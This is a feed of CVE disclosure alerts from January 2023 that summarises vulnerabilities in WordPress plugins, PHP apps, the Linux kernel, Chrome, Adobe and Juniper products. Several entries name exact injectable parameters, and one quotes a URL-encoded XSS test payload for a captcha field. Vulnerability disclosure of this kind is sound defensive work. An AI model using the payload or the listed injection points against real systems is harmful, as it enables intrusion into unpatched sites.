🚨 CVE-2022-45167An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application allows a basic user to access the profile information of all connected users.🎖@cveNotify |
|
| 2023-01-14 14:29:53 |
🚨 CVE-2023-22479KubePi is a modern Kubernetes panel. A session fixation attack allows an attacker to hijack a legitimate user session, versions 1.6.3 and below are susceptible. A patch will be released in version 1.6.4.🎖@cveNotify |
|
| 2023-01-14 14:29:52 |
🚨 CVE-2022-47943An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.19 before 5.19.2. There is an out-of-bounds read and OOPS for SMB2_WRITE, when there is a large length in the zero DataOffset case.🎖@cveNotify |
|
| 2023-01-14 14:29:48 |
🚨 CVE-2022-47939An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.19 before 5.19.2. fs/ksmbd/smb2pdu.c has a use-after-free and OOPS for SMB2_TREE_DISCONNECT.🎖@cveNotify |
|
| 2023-01-14 14:29:47 |
🚨 CVE-2022-47942An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.19 before 5.19.2. There is a heap-based buffer overflow in set_ntacl_dacl, related to use of SMB2_QUERY_INFO_HE after a malformed SMB2_SET_INFO_HE command.🎖@cveNotify |
|
| 2023-01-14 14:29:46 |
🚨 CVE-2022-4422This issue affects: Bulutses Bilgi Teknolojileri LTD. ?T?. BULUTDESK CALLCENTER versions prior to 3.0.🎖@cveNotify |
|
| 2023-01-14 14:29:42 |
🚨 CVE-2023-0297Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.🎖@cveNotify |
|
| 2023-01-14 14:29:41 |
🚨 CVE-2022-32325JPEGOPTIM v1.4.7 was discovered to contain a segmentation violation which is caused by a READ memory access at jpegoptim.c.🎖@cveNotify |
|
| 2023-01-14 02:29:51 |
🚨 CVE-2023-217913D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21792, CVE-2023-21793.🎖@cveNotify |
|
| 2023-01-14 02:29:50 |
🚨 CVE-2022-4294Norton, Avira, Avast and AVG Antivirus for Windows may be susceptible to a Privilege Escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.🎖@cveNotify |
|
| 2023-01-14 02:29:49 |
🚨 CVE-2023-217923D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21793.🎖@cveNotify |
|
| 2023-01-14 02:29:48 |
🚨 CVE-2023-217933D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792.🎖@cveNotify |
|
| 2023-01-14 02:29:46 |
🚨 CVE-2022-41721A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.🎖@cveNotify |
|
| 2023-01-14 02:29:45 |
🚨 CVE-2022-46093Hospital Management System v1.0 is vulnerable to SQL Injection. Attackers can gain administrator privileges without the need for a password.🎖@cveNotify |
|
| 2023-01-14 02:29:44 |
🚨 CVE-2022-32294** DISPUTED ** Zimbra Collaboration Open Source 8.8.15 does not encrypt the initial-login randomly created password (from the "zmprove ca" command). It is visible in cleartext on port UDP 514 (aka the syslog port). NOTE: a third party reports that this cannot be reproduced.🎖@cveNotify |
|
| 2023-01-14 02:29:42 |
🚨 CVE-2015-10042** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical was found in Dovgalyuk AIBattle. Affected by this vulnerability is the function registerUser of the file site/procedures.php. The manipulation of the argument postLogin leads to sql injection. The name of the patch is 448e9880aac18ae7832f8d065e03e46ce0f1d3e3. It is recommended to apply a patch to fix this issue. The identifier VDB-218305 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-14 02:29:41 |
🚨 CVE-2017-20169A vulnerability, which was classified as critical, has been found in GGGGGGGG ToN-MasterServer. Affected by this issue is some unknown functionality of the file public_html/irc_updater/svr_request_pub.php. The manipulation leads to sql injection. The name of the patch is 3a4c7e6d51bf95760820e3245e06c6e321a7168a. It is recommended to apply a patch to fix this issue. VDB-218306 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-14 02:29:37 |
🚨 CVE-2022-42136Authenticated mail users, under specific circumstances, could add files with unsanitized content in public folders where the IIS user had permission to access. That action, could lead an attacker to store arbitrary code on that files and execute RCE commands.🎖@cveNotify |
|
| 2023-01-14 02:29:36 |
🚨 CVE-2022-45299An issue in the IpFile argument of rust-lang webbrowser-rs v0.8.2 allows attackers to access arbitrary files via supplying a crafted URL.🎖@cveNotify |
|
| 2023-01-14 02:29:35 |
🚨 CVE-2023-21595Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-13 22:30:02 |
🚨 CVE-2022-46947Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category.🎖@cveNotify |
|
| 2023-01-13 22:30:01 |
🚨 CVE-2022-46949Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_helmet.🎖@cveNotify |
|
| 2023-01-13 22:30:00 |
🚨 CVE-2022-46950Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_window.🎖@cveNotify |
|
| 2023-01-13 22:29:59 |
🚨 CVE-2022-46951Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_uploads.🎖@cveNotify |
|
| 2023-01-13 22:29:58 |
🚨 CVE-2022-46952Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_user.🎖@cveNotify |
|
| 2023-01-13 22:29:54 |
🚨 CVE-2022-46953Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=save_window.🎖@cveNotify |
|
| 2023-01-13 22:29:53 |
🚨 CVE-2022-46954Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_transaction.🎖@cveNotify |
|
| 2023-01-13 22:29:52 |
🚨 CVE-2022-46955Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=save_queue.🎖@cveNotify |
|
| 2023-01-13 22:29:51 |
🚨 CVE-2022-46956Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/manage_user.php.🎖@cveNotify |
|
| 2023-01-13 22:29:50 |
🚨 CVE-2023-0293The Mediamatic – Media Library Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change image categories, which it uses to arrange them in folder views.🎖@cveNotify |
|
| 2023-01-13 22:29:46 |
🚨 CVE-2023-0294The Mediamatic – Media Library Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on its AJAX actions function. This makes it possible for unauthenticated attackers to change image categories used by the plugin, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-01-13 22:29:45 |
🚨 CVE-2023-0295The Launchpad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of its settings parameters in versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2023-01-13 22:29:44 |
🚨 CVE-2023-21588Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-13 22:29:43 |
🚨 CVE-2023-21589Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-13 22:29:39 |
🚨 CVE-2023-21590Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-13 22:29:38 |
🚨 CVE-2023-21591Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-13 22:29:37 |
🚨 CVE-2022-38490An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03. Some parameters allow SQL injection.🎖@cveNotify |
|
| 2023-01-13 22:29:36 |
🚨 CVE-2023-22472Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. It is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link on a Windows computer. (e.g. in an email, chat link, etc). There are currently no known workarounds. It is recommended that the Nextcloud Desktop client is upgraded to 3.6.2.🎖@cveNotify |
|
| 2023-01-13 19:29:54 |
🚨 CVE-2009-10001A vulnerability classified as problematic was found in jianlinwei cool-php-captcha up to 0.2. This vulnerability affects unknown code of the file example-form.php. The manipulation of the argument captcha with the input %3Cscript%3Ealert(1)%3C/script%3E leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.3 is able to address this issue. The name of the patch is c84fb6b153bebaf228feee0cbf50728d27ae3f80. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218296.🎖@cveNotify |
|
| 2023-01-13 19:29:53 |
🚨 CVE-2009-10002A vulnerability, which was classified as problematic, has been found in dpup fittr-flickr. This issue affects some unknown processing of the file fittr-flickr/features/easy-exif.js of the component EXIF Preview Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 08875dd8a2e5d0d16568bb0d67cb4328062fccde. It is recommended to apply a patch to fix this issue. The identifier VDB-218297 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-13 19:29:52 |
🚨 CVE-2023-0221Product security bypass vulnerability in ACC prior to version 8.3.4 allows a locally logged-in attacker with administrator privileges to bypass the execution controls provided by ACC using the utilman program.🎖@cveNotify |
|
| 2023-01-13 19:29:48 |
🚨 CVE-2023-0289Cross-site Scripting (XSS) - Stored in GitHub repository craigk5n/webcalendar prior to master.🎖@cveNotify |
|
| 2023-01-13 19:29:47 |
🚨 CVE-2015-10033A vulnerability, which was classified as problematic, was found in jvvlee MerlinsBoard. This affects an unknown part of the component Grade Handler. The manipulation leads to improper authorization. The name of the patch is 134f5481e2914b7f096cd92a22b1e6bcb8e6dfe5. It is recommended to apply a patch to fix this issue. The identifier VDB-217713 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-13 19:29:43 |
🚨 CVE-2022-30788A crafted NTFS image can cause a heap-based buffer overflow in ntfs_mft_rec_alloc in NTFS-3G through 2021.8.22.🎖@cveNotify |
|
| 2023-01-13 19:29:42 |
🚨 CVE-2015-10034A vulnerability has been found in j-nowak workout-organizer and classified as critical. This vulnerability affects unknown code. The manipulation leads to sql injection. The name of the patch is 13cd6c3d1210640bfdb39872b2bb3597aa991279. It is recommended to apply a patch to fix this issue. VDB-217714 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-13 19:29:41 |
🚨 CVE-2015-10035A vulnerability was found in gperson angular-test-reporter and classified as critical. This issue affects the function getProjectTables/addTest of the file rest-server/data-server.js. The manipulation leads to sql injection. The name of the patch is a29d8ae121b46ebfa96a55a9106466ab2ef166ae. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217715.🎖@cveNotify |
|
| 2023-01-13 19:29:37 |
🚨 CVE-2023-0015In SAP BusinessObjects Business Intelligence Platform (Web Intelligence user interface) - version 420, some calls return json with wrong content type in the header of the response. As a result, a custom application that calls directly the jsp of Web Intelligence DHTML may be vulnerable to XSS attacks. On successful exploitation an attacker can cause limited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-01-13 19:29:36 |
🚨 CVE-2023-0013The ABAP Keyword Documentation of SAP NetWeaver Application Server - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, for ABAP and ABAP Platform does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. On successful exploitation an attacker can cause limited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-01-13 19:29:35 |
🚨 CVE-2023-0012In SAP Host Agent (Windows) - versions 7.21, 7.22, an attacker who gains local membership to SAP_LocalAdmin could be able to replace executables with a malicious file that will be started under a privileged account. Note that by default all user members of SAP_LocaAdmin are denied the ability to logon locally by security policy so that this can only occur if the system has already been compromised.🎖@cveNotify |
|
| 2023-01-13 17:29:43 |
🚨 CVE-2023-0113A vulnerability was found in Netis Netcore Router. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file param.file.tgz of the component Backup Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-217591.🎖@cveNotify |
|
| 2023-01-13 17:29:39 |
🚨 CVE-2019-13114http.c in Exiv2 through 0.27.1 allows a malicious http server to cause a denial of service (crash due to a NULL pointer dereference) by returning a crafted response that lacks a space character.🎖@cveNotify |
|
| 2023-01-13 17:29:38 |
🚨 CVE-2023-0114A vulnerability was found in Netis Netcore Router. It has been rated as problematic. Affected by this issue is some unknown functionality of the file param.file.tgz of the component Backup Handler. The manipulation leads to cleartext storage in a file or on disk. Local access is required to approach this attack. The identifier of this vulnerability is VDB-217592.🎖@cveNotify |
|
| 2023-01-13 17:29:37 |
🚨 CVE-2017-14859An Invalid memory address dereference was discovered in Exiv2::StringValueBase::read in value.cpp in Exiv2 0.26. The vulnerability causes a segmentation fault and application crash, which leads to denial of service.🎖@cveNotify |
|
| 2023-01-13 17:29:36 |
🚨 CVE-2023-22454Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 3.0.0.beta16 on the `beta` and `tests-passed` branches, pending post titles can be used for cross-site scripting attacks. Pending posts can be created by unprivileged users when a category has the "require moderator approval of all new topics" setting set. This vulnerability can lead to a full XSS on sites which have modified or disabled Discourse’s default Content Security Policy. A patch is available in versions 2.8.14 and 3.0.0.beta16.🎖@cveNotify |
|
| 2023-01-13 16:30:00 |
🚨 CVE-2022-47860Lead Management System v1.0 is vulnerable to SQL Injection via the id parameter in removeProduct.php.🎖@cveNotify |
|
| 2023-01-13 16:29:59 |
🚨 CVE-2022-47866Lead management system v1.0 is vulnerable to SQL Injection via the id parameter in removeBrand.php.🎖@cveNotify |
|
| 2023-01-13 16:29:58 |
🚨 CVE-2023-0141Insufficient policy enforcement in CORS in Google Chrome prior to 109.0.5414.74 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-01-13 16:29:54 |
🚨 CVE-2022-2196A regression exists in the Linux Kernel within KVM: nVMX that allowed for speculative execution attacks. L2 can carry out Spectre v2 attacks on L1 due to L1 thinking it doesn't need retpolines or IBPB after running L2 due to KVM (L0) advertising eIBRS support to L1. An attacker at L2 with code execution can execute code on an indirect branch on the host machine. We recommend upgrading to Kernel 6.2 or past commit 2e7eab81425a🎖@cveNotify |
|
| 2023-01-13 16:29:53 |
🚨 CVE-2023-0140Inappropriate implementation in in File System API in Google Chrome on Windows prior to 109.0.5414.74 allowed a remote attacker to bypass file system restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-01-13 16:29:52 |
🚨 CVE-2023-0137Heap buffer overflow in Platform Apps in Google Chrome on Chrome OS prior to 109.0.5414.74 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-01-13 16:29:48 |
🚨 CVE-2023-0138Heap buffer overflow in libphonenumber in Google Chrome prior to 109.0.5414.74 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-01-13 16:29:47 |
🚨 CVE-2023-0134Use after free in Cart in Google Chrome prior to 109.0.5414.74 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via database corruption and a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-01-13 16:29:46 |
🚨 CVE-2023-0132Inappropriate implementation in in Permission prompts in Google Chrome on Windows prior to 109.0.5414.74 allowed a remote attacker to force acceptance of a permission prompt via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-01-13 16:29:42 |
🚨 CVE-2022-45798A link following vulnerability in the Damage Cleanup Engine component of Trend Micro Apex One and Trend Micro Apex One as a Service could allow a local attacker to escalate privileges by creating a symbolic link and abusing the service to delete a file. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-01-13 16:29:41 |
🚨 CVE-2021-46872An issue was discovered in Nim before 1.6.2. The RST module of the Nim language stdlib, as used in NimForum and other products, permits the javascript: URI scheme and thus can lead to XSS in some applications. (Nim versions 1.6.2 and later are fixed; there may be backports of the fix to some earlier versions. NimForum 2.2.0 is fixed.)🎖@cveNotify |
|
| 2023-01-13 16:29:40 |
🚨 CVE-2022-3782keycloak: path traversal via double URL encoding. A flaw was found in Keycloak, where it does not properly validate URLs included in a redirect. An attacker can use this flaw to construct a malicious request to bypass validation and access other URLs and potentially sensitive information within the domain or possibly conduct further attacks. This flaw affects any client that utilizes a wildcard in the Valid Redirect URIs field.🎖@cveNotify |
|
| 2023-01-13 14:30:37 |
🚨 CVE-2021-4310A vulnerability was found in 01-Scripts 01-Artikelsystem. It has been classified as problematic. Affected is an unknown function of the file 01article.php. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is ae849b347a58c2cb1be38d04bbe56fc883d5d84a. It is recommended to apply a patch to fix this issue. VDB-217662 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-13 12:31:08 |
🚨 CVE-2022-45934An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets.🎖@cveNotify |
|
| 2023-01-13 12:31:07 |
🚨 CVE-2022-45884An issue was discovered in the Linux kernel through 6.0.9. drivers/media/dvb-core/dvbdev.c has a use-after-free, related to dvb_register_device dynamically allocating fops.🎖@cveNotify |
|
| 2023-01-13 12:31:06 |
🚨 CVE-2022-45885An issue was discovered in the Linux kernel through 6.0.9. drivers/media/dvb-core/dvb_frontend.c has a race condition that can cause a use-after-free when a device is disconnected.🎖@cveNotify |
|
| 2023-01-13 12:31:05 |
🚨 CVE-2022-45886An issue was discovered in the Linux kernel through 6.0.9. drivers/media/dvb-core/dvb_net.c has a .disconnect versus dvb_device_open race condition that leads to a use-after-free.🎖@cveNotify |
|
| 2023-01-13 12:31:01 |
🚨 CVE-2022-45887An issue was discovered in the Linux kernel through 6.0.9. drivers/media/usb/ttusb-dec/ttusb_dec.c has a memory leak because of the lack of a dvb_frontend_detach call.🎖@cveNotify |
|
| 2023-01-13 12:31:00 |
🚨 CVE-2022-2964A flaw was found in the Linux kernel’s driver for the ASIX AX88179_178A-based USB 2.0/3.0 Gigabit Ethernet Devices. The vulnerability contains multiple out-of-bounds reads and possible out-of-bounds writes.🎖@cveNotify |
|
| 2023-01-13 12:30:59 |
🚨 CVE-2022-4705The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_final_settings_setup' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to finalize activation of preset site configuration templates, which can be chosen and imported via a separate action documented in CVE-2022-4704.🎖@cveNotify |
|
| 2023-01-13 12:30:55 |
🚨 CVE-2022-4704The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_import_templates_kit' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to import preset site configuration templates including images and settings.🎖@cveNotify |
|
| 2023-01-13 12:30:54 |
🚨 CVE-2022-4707The Royal Elementor Addons plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.59. This is due to missing nonce validation in the 'wpr_create_mega_menu_template' AJAX function. This allows unauthenticated attackers to create Mega Menu templates, granted they can trick an administrator into performing an action, such as clicking a link.🎖@cveNotify |
|
| 2023-01-13 12:30:53 |
🚨 CVE-2022-4709The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_import_library_template' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to import and activate templates from the plugin's template library.🎖@cveNotify |
|
| 2023-01-13 12:30:52 |
🚨 CVE-2022-4710The Royal Elementor Addons plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.3.59, due to due to insufficient input sanitization and output escaping of the 'wpr_ajax_search_link_target' parameter in the 'data_fetch' function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is occurring because 'sanitize_text_field' is insufficient to prevent attribute-based Cross-Site Scripting🎖@cveNotify |
|
| 2023-01-13 12:30:49 |
🚨 CVE-2023-0162The CPO Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of its content type settings parameters in versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-01-13 12:30:48 |
🚨 CVE-2022-4700The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_activate_required_theme' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to activate the 'royal-elementor-kit' theme. If no such theme is installed doing so can also impact site availability as the site attempts to load a nonexistent theme.🎖@cveNotify |
|
| 2023-01-13 12:30:47 |
🚨 CVE-2022-4701The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_activate_required_plugins' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to activate the 'contact-form-7', 'media-library-assistant', or 'woocommerce' plugins if they are installed on the site.🎖@cveNotify |
|
| 2023-01-13 12:30:46 |
🚨 CVE-2022-4702The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_fix_royal_compatibility' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to deactivate every plugin on the site unless it is part of an extremely limited hardcoded selection. This also switches the site to the 'royal-elementor-kit' theme, potentially resulting in availability issues.🎖@cveNotify |
|
| 2023-01-13 12:30:45 |
🚨 CVE-2022-4703The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_reset_previous_import' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to reset previously imported data.🎖@cveNotify |
|
| 2023-01-13 02:29:51 |
🚨 CVE-2023-22407An Incomplete Cleanup vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). An rpd crash can occur when an MPLS TE tunnel configuration change occurs on a directly connected router. This issue affects: Juniper Networks Junos OS All versions prior to 18.4R2-S7; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R3; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2. Juniper Networks Junos OS Evolved All versions prior to 19.2R3-EVO; 19.3 versions prior to 19.3R3-EVO; 19.4 versions prior to 19.4R3-EVO; 20.1 versions prior to 20.1R3-EVO; 20.2 versions prior to 20.2R2-EVO.🎖@cveNotify |
|
| 2023-01-13 02:29:47 |
🚨 CVE-2023-22408An Improper Validation of Array Index vulnerability in the SIP ALG of Juniper Networks Junos OS on SRX 5000 Series allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). When an attacker sends an SIP packets with a malformed SDP field then the SIP ALG can not process it which will lead to an FPC crash and restart. Continued receipt of these specific packets will lead to a sustained Denial of Service. This issue can only occur when both below mentioned conditions are fulfilled: 1. Call distribution needs to be enabled: [security alg sip enable-call-distribution] 2. The SIP ALG needs to be enabled, either implicitly / by default or by way of configuration. To confirm whether SIP ALG is enabled on SRX, and MX with SPC3 use the following command: user@host> show security alg status | match sip SIP : Enabled This issue affects Juniper Networks Junos OS on SRX 5000 Series: 20.4 versions prior to 20.4R3-S5; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S3; 21.3 versions prior to 21.3R3-S3; 21.4 versions prior to 21.4R3-S2; 22.1 versions prior to 22.1R2-S2, 22.1R3; 22.2 versions prior to 22.2R3; 22.3 versions prior to 22.3R1-S1, 22.3R2. This issue does not affect Juniper Networks Junos OS versions prior to 20.4R1.🎖@cveNotify |
|
| 2023-01-13 02:29:46 |
🚨 CVE-2023-22411An Out-of-Bounds Write vulnerability in Flow Processing Daemon (flowd) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause Denial of Service (DoS). On SRX Series devices using Unified Policies with IPv6, when a specific IPv6 packet goes through a dynamic-application filter which will generate an ICMP deny message, the flowd core is observed and the PFE is restarted. This issue affects: Juniper Networks Junos OS on SRX Series: 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R3-S9; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S4; 20.4 versions prior to 20.4R3-S3; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2; 21.4 versions prior to 21.4R2.🎖@cveNotify |
|
| 2023-01-13 02:29:45 |
🚨 CVE-2023-22412An Improper Locking vulnerability in the SIP ALG of Juniper Networks Junos OS on MX Series with MS-MPC or MS-MIC card and SRX Series allows an unauthenticated, network-based attacker to cause a flow processing daemon (flowd) crash and thereby a Denial of Service (DoS). Continued receipt of these specific packets will cause a sustained Denial of Service condition. This issue occurs when SIP ALG is enabled and specific SIP messages are processed simultaneously. This issue affects: Juniper Networks Junos OS on MX Series and SRX Series 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R3-S2; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R3; 22.1 versions prior to 22.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 20.4R1 on MX Series, or SRX Series.🎖@cveNotify |
|
| 2023-01-13 02:29:42 |
🚨 CVE-2023-22413An Improper Check or Handling of Exceptional Conditions vulnerability in the IPsec library of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause Denial of Service (DoS). On all MX platforms with MS-MPC or MS-MIC card, when specific IPv4 packets are processed by an IPsec6 tunnel, the Multiservices PIC Management Daemon (mspmand) process will core and restart. This will lead to FPC crash. Traffic flow is impacted while mspmand restarts. Continued receipt of these specific packets will cause a sustained Denial of Service (DoS) condition. This issue only occurs if an IPv4 address is not configured on the multiservice interface. This issue affects: Juniper Networks Junos OS on MX Series All versions prior to 19.4R3-S9; 20.1 version 20.1R3-S5 and later versions; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R2.🎖@cveNotify |
|
| 2023-01-13 02:29:41 |
🚨 CVE-2023-22416A Buffer Overflow vulnerability in SIP ALG of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). On all MX Series and SRX Series platform with SIP ALG enabled, when a malformed SIP packet is received, the flow processing daemon (flowd) will crash and restart. This issue affects: Juniper Networks Junos OS on MX Series and SRX Series 20.4 versions prior to 20.4R3-S5; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S2; 21.3 versions prior to 21.3R3-S1; 21.4 versions prior to 21.4R3; 22.1 versions prior to 22.1R1-S2, 22.1R2; 22.2 versions prior to 22.2R1-S1, 22.2R2. This issue does not affect Juniper Networks Junos OS versions prior to 20.4R1 on SRX Series.🎖@cveNotify |
|
| 2023-01-13 02:29:40 |
